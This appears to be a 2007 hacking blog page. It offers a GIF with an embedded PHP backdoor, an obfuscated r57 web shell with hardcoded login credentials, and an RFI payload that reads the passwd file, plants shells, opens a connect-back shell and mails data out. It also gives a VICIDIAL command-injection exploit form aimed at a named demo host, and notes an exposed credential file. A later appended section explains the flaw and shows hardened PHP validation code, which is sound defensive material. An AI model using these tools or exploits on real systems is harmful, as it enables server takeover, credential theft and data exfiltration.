Saturday, May 26, 2007

Some PHP Tools


sujiru.googlepages.com/kidlat.gif - a working GIF with a PHP backdoor embedded. Useful for sites that have a local file inclusion vulnerability and accept only picture uploads.

Sujiru.php - r57 PHP shell ver 1.31. The original release was backdoored; those backdoors were removed from this file. The code was also obfuscated to frustrate casual examination by anyone finding and reading the file. User:sujiru Pass:akoaymaylobo. You can change the values declared in the file. Also available in .txt

Payload.php - Used primarily for RFI. Gives info about the host, reads the passwd file, and looks for interesting files in the webroot. Automatically writes the above PHP shell in two locations, the first and last writeable directories it finds relative to the vulnerable script. Tries to establish a connectback shell to a host you specify. You can specify the host by using file.php?ip= or by editing the $ip variable. Also mails information. Note: I didn't have the time to clean the code, but everything works. Also available in .txt

Wednesday, May 23, 2007

Cisco FTP Vulnerability

Timeline:

May 9, 2007 - Cisco announces vulnerability

May 11, 2007 - Cisco says FTP vulnerability may provide hacker backdoor

May 15, 2007 - Some dispute the "backdoor" scenario

May 16, 2007 - Report about major Cisco outage in Japan.

Sunday, May 20, 2007

VICIDIAL Vulnerability

VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.

More information could be found at http://astguiclient.sourceforge.net/vicidial.html

Exploiting...

On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access, thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.

Once we have a valid username and password, we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like:

<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>


Change the host and directory if needed and save as an .htm file. Spaces appear to be filtered.
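The weakness described above is a classic command-injection pattern: a query parameter is dropped into a shell command line, so a ";" in the value ends the intended command and starts another. The following is an added example written for this page, not VICIDIAL's own code: a hypothetical date-filter handler in its vulnerable shape beside two hardened shapes. The function names, the sample log lines and the log path are constructed for the illustration.

```php
<?php
// Added example (not VICIDIAL code). Hypothetical log path used as a placeholder.
const ADMIN_LOG_PATH = '/path/to/admin_changes_log.txt';

// Vulnerable shape (illustrative only, never executed here): the raw value of
// query_date is interpolated into a command line. A value such as
// "1;id" becomes two commands, which is exactly the injection described above.
function build_command_unsafe(string $query_date): string {
    return 'grep ' . $query_date . ' ' . ADMIN_LOG_PATH;
}

// Hardened shape 1: allow-list the value against the one shape a date can have,
// reject impossible dates, and still quote it for the shell (defence in depth).
function build_command_safe(string $query_date): string {
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $query_date)) {
        throw new InvalidArgumentException('query_date must be YYYY-MM-DD');
    }
    [$y, $m, $d] = array_map('intval', explode('-', $query_date));
    if (!checkdate($m, $d, $y)) {
        throw new InvalidArgumentException('query_date is not a real calendar date');
    }
    // escapeshellarg() wraps the value in single quotes and escapes embedded quotes,
    // so even a value that slipped past the regex could not break out of the argument.
    return 'grep ' . escapeshellarg($query_date) . ' ' . ADMIN_LOG_PATH;
}

// Hardened shape 2 (preferred): do not involve a shell at all. Filter the log
// lines in PHP; there is no command line for a metacharacter to influence.
function filter_log_lines(array $lines, string $query_date): array {
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $query_date)) {
        throw new InvalidArgumentException('query_date must be YYYY-MM-DD');
    }
    return array_values(array_filter(
        $lines,
        fn(string $line): bool => str_starts_with($line, $query_date)
    ));
}

// Constructed sample input, standing in for admin_changes_log.txt.
$sample_lines = [
    '2007-05-19 10:02:11 admin changed campaign TEST',
    '2007-05-20 08:15:42 admin added user 1001',
    '2007-05-20 09:40:03 admin removed user 1002',
];

foreach (['2007-05-20', '1;id', '2007-02-30'] as $input) {
    echo "input: $input\n";
    echo "  unsafe command would be: " . build_command_unsafe($input) . "\n";
    try {
        echo "  safe command: " . build_command_safe($input) . "\n";
        echo "  matching lines: " . count(filter_log_lines($sample_lines, $input)) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  rejected: " . $e->getMessage() . "\n";
    }
}
```

Running this shows "2007-05-20" accepted (two matching lines), "1;id" rejected by the allow-list before any command is built, and "2007-02-30" rejected by checkdate() even though it matches the regex. The same allow-list approach is what a request filter or WAF rule would check for: a query_date value containing anything other than digits and dashes is a request worth logging and alerting on. The unprotected project_auth_entries.txt mentioned above is a separate issue, fixed by keeping credential files outside the web root or denying direct access to them in the web server configuration.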